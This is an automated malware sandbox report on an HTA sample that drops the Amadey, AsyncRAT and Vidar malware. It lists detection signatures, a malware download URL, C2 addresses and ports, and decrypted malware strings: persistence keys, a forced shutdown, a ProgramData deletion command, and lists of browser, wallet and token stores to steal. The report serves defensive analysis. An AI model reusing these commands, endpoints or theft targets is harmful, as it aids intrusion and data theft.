Windows Analysis Report
SeP4o9Jp8A.hta

Overview

General Information

Sample name: SeP4o9Jp8A.hta
renamed because original name is a hash value
Original sample name: 0fbeda64692d967eee2451cedcec0989f226ffceba72d6ccefa61befa14ac70f.hta
Analysis ID: 1599702
MD5: 7c149412d115b6a1f3fd7ce75012589b
SHA1: d82b268dcfefbb6370714f2cbfadb510c5e3480e
SHA256: 0fbeda64692d967eee2451cedcec0989f226ffceba72d6ccefa61befa14ac70f
Tags: htauser-JAMESWT_MHT
Infos:

Detection

Amadey, AsyncRAT, PureLog Stealer, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Sigma detected: Search for Antivirus process
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected AsyncRAT
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected Vidar stealer
Yara detected obfuscated html page
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
PE file contains section with special chars
Potentially malicious time measurement code found
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
AsyncRAT AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

barindex
Source: https://176.113.115.163/thebig/stail.exe Avira URL Cloud: Label: malware
Source: 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199819539662", "Botnet": "go2dniz"}
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack Malware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "159.100.19.137", "Ports": "7707", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "svchost.exe", "Install_File": "MTZ4cVRldGczWDFoSHVwbHNqYlc2ZE9GUXRheUlEdnY="}
Source: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ugdKEDU[1].exe ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\stail[1].exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tYrnx75[1].exe ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1053669001\b191a8c87b.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1053671001\0269e2f5f3.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 63%
Source: SeP4o9Jp8A.hta Virustotal: Detection: 23% Perma Link
Source: SeP4o9Jp8A.hta ReversingLabs: Detection: 18%
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.8% probability
Source: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Joe Sandbox ML: detected
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: 185.215.113.43
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: /Zu7JuNko/index.php
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: S-%lu-
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: abc3bc1985
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: skotes.exe
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Startup
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: cmd /C RMDIR /s/q
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: rundll32
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Programs
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: %USERPROFILE%
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: cred.dll|clip.dll|
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: cred.dll
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: clip.dll
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: http://
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: https://
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: /quiet
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: /Plugins/
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: &unit=
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: shell32.dll
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: kernel32.dll
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: GetNativeSystemInfo
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: ProgramData\
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: AVAST Software
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Kaspersky Lab
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Panda Security
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Doctor Web
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: 360TotalSecurity
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Bitdefender
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Norton
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Sophos
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Comodo
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: WinDefender
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: 0123456789
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: ------
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: ?scr=1
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: ComputerName
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: -unicode-
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: VideoID
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: DefaultSettings.XResolution
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: DefaultSettings.YResolution
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: ProductName
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: CurrentBuild
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: rundll32.exe
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: "taskkill /f /im "
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: " && timeout 1 && del
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: && Exit"
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: " && ren
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Powershell.exe
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: -executionpolicy remotesigned -File "
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: shutdown -s -t 0
Source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp String decryptor: random
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: 7707
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: 159.100.19.137
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: 0.5.8
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: false
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: yBu0GW2G5zAc
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: MIIE7DCCAtSgAwIBAgIQAM+os8tD+NpTWChT8JYtyzANBgkqhkiG9w0BAQ0FADAXMRUwEwYDVQQDDAxUcnVzdCBTZXJ2ZXIwIBcNMjUwMTIwMDM1NjA0WhgPOTk5OTEyMzEyMzU5NTlaMBcxFTATBgNVBAMMDFRydXN0IFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJ5FzkhjuI8et+p8G29QDGsZ28VZ1PtKbMZx8FrxkUQoQBU7DXFh8mfgTQUhWgMqctpupDC+UhQxQkedPdHe9SvuAtpKEWUFOQzNQMTy3JEvHv3UZfM9Ib5ICGCQtcqInk73RbEh7QdFBK6wE57zENL9lXy8aEBeJk/elSNvLTJwbpa+lP20hlBuuyBWqvPd4/DinQJIRYSIEPDa3hcefGCbnoTp3dg9jttDM+MXtGEz4OurkP47+nFeHgQe7FkNCi5UHaiwvNs8JR7L1yR7HTPlvSwRtAkC0STJtczRA93If63bYMkaC+1QNHQR+WN3c9MCK6SLbGk4nMfSiG3ybohbKhNoJIcsdyFyOOn6N54eCaEwwNzDlb1qkor0bemYVuaT3ZRG27H6C9R9eqyoHQ4WTppSBIm+MBQ+gimD6XdEUCBcM0qAvrVFEy+mFn8FIhKAng9fgPnd47WWJGosTjsezqxJTVYYhUn2dm/VU3O0sdfzJ8O9dIO4htYIs+X5PMuBP2HyLGDsa+VpEkayYMYGmiHD6wDrO20+Z5BdbGUikNdfKo4goEu3A/HIa7YuzFN70ma9Qb+7P448L3mu8pLbll+0iUNo2rYrJ+7nMjduOTeKdBPPYNBHj57Zdd1MkQaIBhHNQ04qdBZYUhJclvbLlx1nPLSMQI9XL0NoRDXvAgMBAAGjMjAwMB0GA1UdDgQWBBSnnBI6rWXybai+OiRUoM3TzO1xlTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCLFgYyTM5EWEcXb2nZYzeqhuu/lhz0AuSDBoXDWQYuV1CgsKoab0s2yZ1v0jRw77uM1AsLSRhBurUqdmn+iZVi/vtys/BrLFwuc/5hQkz5MFZAt2qJFc8QRV8E6jJcjuapfJT4oweDd8J1Dstz2x2g6IV8mT5mApzjom+zZwy0G9Qm6S72xbaz8HZicPNRfDUR0SMg652oet7qMrCa2T5T5lrh3+XDogmC1ofzA2lbWuhOb6LNs0uzjiC/NENspNylQFf1D+odhNDdQQHu91SSZLnouuhb9jErxYvCoW7c5U14xsNPKRAjcONjtPSbhMvIwaApa2/wVSil0bk8dbSLnA6Kx7UBPgls8ec/jhgkHTycXE6U8XoPS+louYxi5EdwvqghzRC/itX+SPBq9pMpN8FWXEgVliWc0ViOwS/okPlCW60cFGU+R0lQbYJDyVDqJBflraw7Hqb7cQS5v2gCgogUQBqD9I7SiYbbqs0GUh/b3Zv+Qt7wKzyEGJNuoRei7uDp1xb5uDNprDkZomqHmiSKc1LggyPY4+rcNLDTEkXPq/cjMI2CzPXEpHARNgMQ/YEzM07I51CLT2Szm7G3z8uIng35vjc24l3AqClQ1dcJHQBIHjEqoqrUGLmjUiFfGuL549Mt6Na3OmoCTb0J+r6S8/sp2l/nX9HqHqAoxA==
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: GP97vNLr0Wa9AfljI/phz7VBswKUASqgiIZZNodWNIPzI+56yXWuOpvWNTQgDoUgAOskV2wmjD76A2aVNhUQyD92KSnqDXlLV+P47rGl14aHUzYeuCKUXHJvFlkQk8GfPZNKaXZNiDGmKibSepgjoJIIM3/Vc+3s07D2Dmv8Bo2hYGsNeAEVOq3oF0fCL5kPxaUCQE+9cR0dxZoIfy5DlW14E6ZSTfnUegUZ8g8ADtxIu5h+2fL58CwzpUlLdw8kRHvK2JPYQSAXV3IiMTw58KlB34+Nw51yoc05UAGmWcMJPRuU2+p/l1cNkzDepbf1evSE6bARyi/iao6lMUMD6paEM4DxEFckeqpVjs3BIx6A1EcYTcx8NepXiEhp/eqoqoCjHS/jwuMPB8KLFpBK7upxBrI6YtoB+sFqHq9bo62za97eZbIE5lxlsp88UEhUa6rAgiH9QNyqb+pfOX7MpaYBYpFDqizolVMqtQC20H8E6szaut4gjCIOUqUHhBSgFtWjJGR1F6x4RUn8llIW1Bvn6uRNFur5U9N5XYZxRThgmv05Cr+Qb09v+D95XyOJqvUSTWKXzmr1tMNRcNEyT3g74VybkYdRldrU1n3+MmLM7RsivXydzIm4+qzkyH58CXkq8767vS6MX3HvkK+WsPnITsc0iub7sUPhNwTofv8=
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: false
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: null
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: false
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack String decryptor: Default

Phishing

barindex
Source: Yara match File source: SeP4o9Jp8A.hta, type: SAMPLE

Compliance

barindex
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Unpacked PE file: 54.2.crossplatformplayer.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Cross-platform Player_is1
Source: Binary string: vdr1.pdb source: ugdKEDU.exe, 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: signatureAlgorithmcertsOCSP_SIGNATUREhashAlgorithmissuerNameHashissuerKeyHashOCSP_CERTIDreqCertsingleRequestExtensionsOCSP_ONEREQrequestorNamerequestListrequestExtensionsOCSP_REQINFOtbsRequestoptionalSignatureOCSP_REQUESTresponseTyperesponseOCSP_RESPBYTESresponseStatusresponseBytesOCSP_RESPONSEvalue.byNamevalue.byKeyOCSP_RESPIDrevocationTimerevocationReasonOCSP_REVOKEDINFOvalue.goodvalue.revokedvalue.unknownOCSP_CERTSTATUScertIdcertStatusthisUpdatenextUpdatesingleExtensionsOCSP_SINGLERESPresponderIdproducedAtresponsesresponseExtensionsOCSP_RESPDATAtbsResponseDataOCSP_BASICRESPcrlUrlcrlNumcrlTimeOCSP_CRLIDlocatorOCSP_SERVICELOCcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.4.0 22 Oct 2024built on: Sun Jan 19 01:49:05 2025 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\12\decryptor\target\release\build\openssl-sys-da6622e085c0367c\out\openssl-build\install\SYSANAGER:[OPENSSL]"userSDIR: "C:\12\decryptor\target\release\build\openssl-sys-da6622e085c0367c\out\openssl-build\install\lib\users-3"MODULESDIR: "C:\12\decryptor\target\release\build\openssl-sys-da6622e085c0367c\out\openssl-build\install\lib\ossl-modules"CPUINFO: N/AOSSL_WINCTX: Undefinednot availableevp_pkey_asym_cipher_initcrypto\evp\asymcipher.cEVP_PKEY_encryptEVP_PKEY_decryptevp_asym_cipher_from_algorithmcrypto\evp\pmeth_lib.cint_ctx_newEVP_PKEY_CTX_dupEVP_PKEY_CTX_get_signature_mdevp_pkey_ctx_set_mdevp_pkey_ctx_set1_octet_stringsecretpassnpmaxmem_bytesoperationevp_pkey_ctx_ctrl_intEVP_PKEY_CTX_ctrlevp_pkey_ctx_ctrl_str_intdistidhexdistidevp_pkey_ctx_store_cached_dataEVP_PKEY_CTX_md source: driver3.exe, 00000020.00000002.3346748725.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp, driver3.exe, 00000020.00000000.2961620464.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: decryptor.pdb source: driver3.exe, 00000020.00000000.2961620464.00007FF7C01A6000.00000002.00000001.01000000.00000017.sdmp
